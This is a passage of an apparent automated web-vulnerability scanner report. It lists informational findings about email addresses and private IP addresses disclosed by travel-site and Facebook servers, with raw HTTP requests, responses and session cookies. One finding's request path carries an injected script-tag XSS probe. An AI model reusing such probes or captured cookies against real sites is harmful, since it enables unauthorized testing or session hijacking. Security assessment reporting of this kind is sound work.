<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...
22.38. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621533; expires=Tue, 02-Oct-2012 00:58:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:53 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...
22.39. http://www.sabretravelnetwork.com/images/home-text.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The following email address was disclosed in the response:

Request

GET /images/home-text.png HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618474; expires=Tue, 02-Oct-2012 00:07:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:55 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...
22.40. http://www.sabretravelnetwork.com/js/colorbox/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /js/colorbox/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/colorbox/jquery.colorbox-min.js HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 18 May 2011 20:18:03 GMT
ETag: "1947f7-242a-95f114c0"
Accept-Ranges: bytes
Content-Length: 9258
Connection: close
Content-Type: application/x-javascript

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V)
...[SNIP]...
22.41. http://www.sabretravelnetwork.com/js/jquery.equalHeights.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /js/jquery.equalHeights.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/jquery.equalHeights.js HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 17 May 2011 21:50:10 GMT
ETag: "888006-12f8-c1890880"
Accept-Ranges: bytes
Content-Length: 4856
Connection: close
Content-Type: application/x-javascript

/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights" & "EqualWidths"
* by:    Scott Jehl, Todd Parker, Maggie Costello Wachs (http://www.filamentgro
...[SNIP]...
dren().css({'min-width': currentWidest});
   });
   return this;
};


/*--------------------------------------------------------------------
* javascript method: "pxToEm"
* by:
Scott Jehl (scott@filamentgroup.com)
Maggie Wachs (maggie@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2008 Filament Group
* Dual licensed under the MIT (filamentgroup.com/examples/mit-license.txt) and GPL (filamentgroup.com/examples/gpl-license
...[SNIP]...
22.42. http://www.travelocity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176568
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:04 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
<meta http-equiv='PICS-Label' content='(PICS-1.1 "http://www.classify.org/safesurf/" L GEN TRUE FOR "./" BY "iag@travelocity.com" R (SS~~000 1))'>
...[SNIP]...
<div class="error-txt">Verify your email address follows the example@email.com format. Please do not use special characters.</div>
...[SNIP]...
22.43. http://www.travelocity.com/472a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /472a

Issue detail

The following email addresses were disclosed in the response:

Request

GET /472a HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 178468
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:06 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
<meta http-equiv='PICS-Label' content='(PICS-1.1 "http://www.classify.org/safesurf/" L GEN TRUE FOR "./" BY "iag@travelocity.com" R (SS~~000 1))'>
...[SNIP]...
<div class="error-txt">Verify your email address follows the example@email.com format. Please do not use special characters.</div>
...[SNIP]...
22.44. http://www.turkishairlines.com/static/js/plugin/datepicker/date_en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/js/plugin/datepicker/date_en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/plugin/datepicker/date_en.js HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Content-Length: 3026
Content-Type: application/x-javascript
Last-Modified: Tue, 20 Sep 2011 14:11:30 GMT
Accept-Ranges: bytes
ETag: "547f9d319f77cc1:1342"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:01:42 GMT

/*
* Date prototype extensions. Doesn't depend on any
* other code. Doens't overwrite existing methods.
*
* Adds dayNames, abbrDayNames, monthNames and abbrMonthNames static properties and isL
...[SNIP]...
yName, getMonthName, getDayOfYear, getWeekOfYear,
* setDayOfYear, addYears, addMonths, addDays, addHours, addMinutes, addSeconds methods
*
* Copyright (c) 2006 J..rn Zaefferer and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*
* Additional methods and properties added by Kelvin Luck: firstDayOfWeek, dateFormat, zeroTime, asString, fromString -
* I've added my name to these methods so you
...[SNIP]...
22.45. http://www.turkishairlines.com/static/js/plugin/jquery-fieldselection.pack.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/js/plugin/jquery-fieldselection.pack.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/plugin/jquery-fieldselection.pack.js HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Content-Length: 1209
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Sep 2011 11:56:37 GMT
Accept-Ranges: bytes
ETag: "e450c52fc376cc1:1342"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:01:46 GMT

/*
* jQuery plugin: fieldSelection - v0.1.0 - last change: 2006-12-16
* (c) 2006 Alex Brem <alex@0xab.cd> - http://blog.0xab.cd
*/
(function(){var c={getSelection:function(){var e=this.jquery?this[
...[SNIP]...
22.46. http://www.turkishairlines.com/static/js/plugin/jquery.combo/jquery.combo.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/js/plugin/jquery.combo/jquery.combo.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /static/js/plugin/jquery.combo/jquery.combo.min.js HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Content-Length: 18078
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Sep 2011 11:56:49 GMT
Accept-Ranges: bytes
ETag: "66ffab36c376cc1:1342"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:01:39 GMT

/***************************************************************************

   thy-combo 2.1.3    : A jQuery date time picker.
   
   Authors:
       Kadalashvili.Vladimir@gmail.com - Vladimir Kadalashvili
       thetoolman@gmail.com
       
   Version: 2.1.3
   
   Website: http://code.google.com/p/thy-combo/
   

* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General P
...[SNIP]...
22.47. http://www.turkishairlines.com/static/js/plugin/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/js/plugin/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/plugin/jquery.cookie.js HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45

Response

HTTP/1.1 200 OK
Content-Length: 4280
Content-Type: application/x-javascript
Last-Modified: Fri, 30 Sep 2011 08:02:27 GMT
Accept-Ranges: bytes
ETag: "a468904b477fcc1:1342"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:58:03 GMT

/*jslint browser: true */ /*global jQuery: true */

/**
* jQuery Cookie plugin
*
* Copyright (c) 2010 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opens
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given key.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String key The key of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (key, value, options) {

// key and at least value given, set cookie...
if (arguments.length >
...[SNIP]...
23. Private IP addresses disclosed  previous  next
There are 130 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

23.1. http://api.connect.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.connect.facebook.com
Path:   /crossdomain.xml

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /crossdomain.xml HTTP/1.1
Host: api.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 02 Nov 2011 00:03:40 GMT
X-FB-Server: 10.32.21.120
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:40 GMT
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...
23.2. http://api.connect.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.connect.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /restserver.php?method=fql.query HTTP/1.1
Host: api.connect.facebook.com
Proxy-Connection: keep-alive
Content-Length: 292
Origin: http://connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

query=SELECT%20total_count%20FROM%20link_stat%20WHERE%20url%3D%22http%3A%2F%2Fhublotnation.com%2F2011%2F09%2F16%2Fhublot-watches-bloghands-on-with-the-classic-fusion-chronograph-yacht-club-de-monaco%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 02 Oct 2011 17:04:42 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.32.1.103
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:42 GMT
Content-Length: 21

[{"total_count":389}]
23.3. http://api.facebook.com/method/fql.query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /method/fql.query

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /method/fql.query?format=json&query=select%20total_count%20from%20link_stat%20where%20url='undefined'&callback=jsonp1317599923384 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 02 Oct 2011 17:01:43 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.64.37.42
X-Cnection: close
Date: Mon, 03 Oct 2011 00:00:43 GMT
Content-Length: 23

jsonp1317599923384([]);
23.4. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fhublotnation.com%2F2011%2F09%2F23%2Fhublot-watchesa-look-at-the-king-power-dwayne-wade%2F%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 02 Oct 2011 17:05:35 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.64.49.60
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:35 GMT
Content-Length: 386

fb_sharepro_render([{"url":"http:\/\/hublotnation.com\/2011\/09\/23\/hublot-watchesa-look-at-the-king-power-dwayne-wade\/","normalized_url":"http:\/\/www.hublotnation.com\/2011\/09\/23\/hublot-watches
...[SNIP]...
23.5. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1317601697719 HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "b3a408fe2b10f28c89a05ef6347c2f17"
X-FB-Server: 10.27.220.114
X-Cnection: close
Content-Length: 139391
Cache-Control: public, max-age=1176
Expires: Mon, 03 Oct 2011 00:48:20 GMT
Date: Mon, 03 Oct 2011 00:28:44 GMT
Connection: close
Vary: Accept-Encoding

/*1317601700,169598066,JIT Construction: v451912,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...
23.6. http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /rsrc.php/v1/yK/r/RIxWozDt5Qq.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yK/r/RIxWozDt5Qq.swf HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Thu, 04 Aug 2011 21:10:10 GMT

Response

HTTP/1.1 200 OK
Content-Length: 3289
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 04 Aug 2011 21:10:10 GMT
X-FB-Server: 10.27.178.109
X-Cnection: close
Cache-Control: public, max-age=237477
Expires: Wed, 05 Oct 2011 18:00:15 GMT
